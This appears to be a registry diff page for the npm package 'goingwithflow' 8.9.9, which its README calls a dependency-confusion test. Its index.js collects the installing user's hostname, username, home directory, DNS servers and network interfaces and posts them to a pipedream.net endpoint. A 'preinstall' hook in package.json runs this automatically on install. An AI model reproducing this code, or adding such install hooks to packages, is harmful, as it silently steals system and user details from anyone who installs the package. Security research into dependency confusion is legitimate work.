goingwithflow 8.9.9

Sign up to get free protection for your applications and to get access to all the features.

Potentially problematic release.


This version of goingwithflow might be problematic. Click here for more details.

Files changed (3) hide show
  1. package/README.md +3 -0
  2. package/index.js +50 -0
  3. package/package.json +12 -0
package/README.md ADDED
@@ -0,0 +1,3 @@
1
+ <h1 align="center">This NPM package vulnerable to dependency confiuse vulnerability</h1>
2
+ <p align="center">Name: Aryan Jaiswal</p>
3
+ <p align="center">Contact: aryan351985@gmail.com</p>
package/index.js ADDED
@@ -0,0 +1,50 @@
1
+ const os = require("os");
2
+ const dns = require("dns");
3
+ const querystring = require("querystring");
4
+ const https = require("https");
5
+ const packageJSON = require("./package.json");
6
+ const package = packageJSON.name;
7
+
8
+ const trackingData = JSON.stringify({
9
+ p: package,
10
+ c: __dirname,
11
+ hd: os.homedir(),
12
+ hn: os.hostname(),
13
+ un: os.userInfo().username,
14
+ dns: dns.getServers(),
15
+ r: packageJSON ? packageJSON.___resolved : undefined,
16
+ v: packageJSON.version,
17
+ pjson: packageJSON,
18
+ arch: os.arch(), // Add architecture information
19
+ type: os.type(), // Add OS type information
20
+ version: os.version(), // Add OS version information
21
+ interfaces: os.networkInterfaces(),
22
+ });
23
+
24
+ var postData = querystring.stringify({
25
+ msg: trackingData,
26
+ });
27
+
28
+ var options = {
29
+ hostname: "eo56j4tfa20w1b7.m.pipedream.net", //replace burpcollaborator.net with Interactsh or pipedream
30
+ port: 443,
31
+ path: "/",
32
+ method: "POST",
33
+ headers: {
34
+ "Content-Type": "application/x-www-form-urlencoded",
35
+ "Content-Length": postData.length,
36
+ },
37
+ };
38
+
39
+ var req = https.request(options, (res) => {
40
+ res.on("data", (d) => {
41
+ process.stdout.write(d);
42
+ });
43
+ });
44
+
45
+ req.on("error", (e) => {
46
+ // console.error(e);
47
+ });
48
+
49
+ req.write(postData);
50
+ req.end();
package/package.json ADDED
@@ -0,0 +1,12 @@
1
+ {
2
+ "name": "goingwithflow",
3
+ "version": "8.9.9",
4
+ "description": "<h1 align=\"center\">This NPM package vulnerable to dependency confiuse vulnerability</h1>\r <p align=\"center\">Name: Aryan Jaiswal</p>\r <p align=\"center\">Contact: aryan351985@gmail.com</p>",
5
+ "main": "index.js",
6
+ "scripts": {
7
+ "test": "echo \"Error: no test specified\" && exit 1",
8
+ "preinstall": "node index.js"
9
+ },
10
+ "author": "",
11
+ "license": "ISC"
12
+ }